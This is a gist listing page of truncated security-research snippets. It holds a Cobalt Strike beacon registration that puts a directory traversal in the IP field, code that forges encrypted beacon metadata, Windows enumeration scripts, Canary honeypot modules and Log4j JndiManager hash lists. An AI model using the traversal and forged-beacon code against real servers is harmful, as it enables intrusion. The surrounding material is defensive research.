This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# First we need to register a beacon with a directory traversal in the ip address field | |
ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0] | |
# Generate symmetric keys (used later) | |
raw_aes_keys = os.urandom(16) | |
aes_key, hmac_key = generate_keys(raw_aes_keys) | |
m = Metadata(public_key=args.public_key, cs_version=3) | |
m.public_key = args.public_key | |
m.bid = args.bid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import M2Crypto | |
import base64 | |
import binascii | |
PUBKEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----" | |
plaintext = "0000BEEF00000056D48A3A7104FC17544D5A3752C6EEAED4E404B5015FAD878000000A0000000431302E30093139322E3136382E3230302E313031094445534B544F502D3337325251544D0961646D696E0972756E646C6C33322E657865" | |
buf = M2Crypto.BIO.MemoryBuffer(PUBKEY_TEMPLATE.format('MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDhOfC4TICevrbgiUVK5kmvU8aNQNiCfccHxIOV4wzjOn5DpaC49NLoKMsS2fVnMI/f+cbyuqfrXMYmUX8eZDWkmflrBFNOPG8hr8oqhm1EiIvK9S+CsOuLGsEOmefqYk+Gj1nfnJ1uO9ELRv1U+OhmQ77w4u0AZWHPSNr1STYhZQIDAQAB')) | |
pubkey = M2Crypto.RSA.load_pub_key_bio(buf) | |
ciphertext = pubkey.public_encrypt(binascii.unhexlify(plaintext), M2Crypto.RSA.pkcs1_padding) | |
print (base64.b64encode(ciphertext)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM °² Enumerates all files extensions ²° | |
REM °² and what opens them on Windows 10 in batch/cmd ²° | |
REM °² twitter: @ollieatnccgroup ²° | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
for /f "tokens=1,2 delims==" %%G in ('assoc') do ( | |
echo Extension: %%G | |
for /f "tokens=1,2 delims==" %%I in ('ftype %%H 2^> nul') do ( | |
echo Program: %%J |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM °² Enumerates all files extensions ²° | |
REM °² and what opens them on Windows 10 in batch/cmd ²° | |
REM °² twitter: @ollieatnccgroup ²° | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
for /f "tokens=1,2 delims==" %%G in ('assoc') do ( | |
for /f "tokens=1,2 delims==" %%I in ('ftype %%H 2^> nul') do ( | |
echo %COMPUTERNAME%,%%G,%%J | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM °² Enumerates all files extensions ²° | |
REM °² and what opens them on Windows 10 in batch/cmd ²° | |
REM °² twitter: @ollieatnccgroup ²° | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM ------------------------------------------------------ | |
REM |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
INCIDENT_NAME = "NCCGROUPHTTPS" | |
VERSION = "0.1" | |
MODULE_DESCRIPTION = "NCCGROUPHTTPS" | |
AUTHOR = "Ollie Whitehouse" | |
AUTHOR_EMAIL = "ollie.whitehouse@nccgroup.com" | |
CERT_FILE = "/tmp/selfsigned.crt" | |
KEY_FILE = "/tmp/private.key" | |
from opencanary.modules import CanaryService |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
######################################################################## | |
# | |
# Thinkst Canary user module | |
# to turn into a high interactive honeypot | |
# https://canary.tools/ | |
# | |
# Ingrediants used: | |
# - WSL | |
# - Developer documentation - https://canary.tools/help/user-modules | |
# - Opencanary for development - https://github.com/thinkst/opencanary/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
######################################################################## | |
# | |
# Thinkst Canary user module | |
# to turn into a high interactive honeypot | |
# https://canary.tools/ | |
# | |
# Ingrediants used: | |
# - WSL | |
# - Developer documentation - https://canary.tools/help/user-modules | |
# - Opencanary for development - https://github.com/thinkst/opencanary/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM °² Calc file hashes and check they are present ²° | |
REM °² in a file ²° | |
REM °² ²° | |
REM °² twitter: @ollieatnccgroup ²° | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM example usage |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
04fdd701809d17465c17c7e603b1b202 ./2.11.0/apache-log4j-2.11.0-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
415c13e7c8505fb056d540eac29b72fa ./2.8/apache-log4j-2.8-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
415c13e7c8505fb056d540eac29b72fa ./2.8.1/apache-log4j-2.8.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
04fdd701809d17465c17c7e603b1b202 ./2.9.0/apache-log4j-2.9.0-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
8b2260b1cce64144f6310876f94b1638 ./2.4.1/apache-log4j-2.4.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
a193703904a3f18fb3c90a877eb5c8a7 ./2.8.2/apache-log4j-2.8.2-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
3bd9f41b89ce4fe8ccbf73e43195a5ce ./2.6.1/apache-log4j-2.6.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
04fdd701809d17465c17c7e603b1b202 ./2.11.2/apache-log4j-2.11.2-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
21f055b62c15453f0d7970a9d994cab7 ./2.13.0/apache-log4j-2.13.0-bin/org/apache/logging/lo |